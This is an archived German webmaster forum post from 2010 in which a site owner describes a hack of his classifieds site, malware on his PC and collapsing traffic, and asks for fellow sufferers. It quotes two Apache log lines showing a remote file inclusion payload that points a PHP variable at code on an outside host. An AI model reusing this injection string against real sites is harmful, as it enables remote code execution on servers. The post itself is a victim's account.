Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Hackerangiff auf Webprojekt seit letzter Woche dauerhaft ...

Forum rund um das Thema Hardware für Webmaster.
euroexchange.de
PostRank 6
PostRank 6

Beitrag von euroexchange.de » 20.04.2010, 13:03

Hallo @all.

Anfang der letzten Woche viel mir ein Codeschnippsel in meinem Kleinanzeigenmarkt auf. Hacker hatten in einigen meiner Javascripts Code eingebracht. Seit dem hatte ich Trojaner und Viren auf meinem Rechner die ich mittels Avira und Spybot letztendlich beseitigen konnte.

Ich habe die Logfiles ausgewertet und festgestellt, das Seitenaufrufe mit dem Anhängen verschiedener URL von mir fremden Seiten stattgefunden haben.

anon-66-113-99-30.ip.invalid - - [20/Apr/2010:11:02:55 +0200] "GET /detail.php?id=328%20%20//europe//index.php?_SERVER[DOCUMENT_ROOT]=https://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 18993 "-" "Mozilla/5.0"
anon-66-113-99-30.ip.invalid - - [20/Apr/2010:11:02:57 +0200] "GET //europe//index.php?_SERVER[DOCUMENT_ROOT]=https://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 302 211 "-" "Mozilla/5.0"

Ich denke, jemand hat versucht per Einschleusung einer Console die Kontrolle über meinen Server (2. Server bei Strato) zu erlangen, denn es wurden Dateien verändert ohne das dabei auch das Datum verändernt wurde.

Die Angriffe fanden meißt täglich vormittags nach 11:00 Uhr und in der Nacht nach 04:00 Uhr statt. Da ich aus der Nachtschicht komme konnte ich hier jeweils die Originalfiles aufspielen und das Problem so lösen.

Samstag und Sonntag gab es keine Angriffe und ich dachte bis eben, das ich das Problem gelöst hätte bis ich...

...beim Surfen mit Firefox (sicherste Zone eingestellt) die Meldung bekam, das ein Java-Addon deaktiviert werden sollte weil es für Sicherheitslücken bekannt sei. Ich sollte es deaktivieren und Firefox neu starten.

Ich habe mich dann schnell aus allen Fenstern abgemeldet und bemerkt, das meine Firewall ausgeschaltet wurde und auch der Virus wieder in meiner Seite war. Anschließend bekam ich die Meldung das eine Datei verändert wurde und mein Windows wurde runtergefahren ohne das ich eingreifen konnte.

Die Seite ist nun fast tot da sogut wie alle Suchmaschinenrankings vernichtet wurden. Die Besucherzahlen sind seit Sonntag abnehmend und von ca. 20.000 pro Tag auf ca. 1.000 pro Tag gefallen.

Gibt es hier evtl. Leidensgenossen die gerade ähnliches erlebt haben oder erleben ...

Viele Grüße
Zuletzt geändert von euroexchange.de am 27.04.2010, 14:54, insgesamt 1-mal geändert.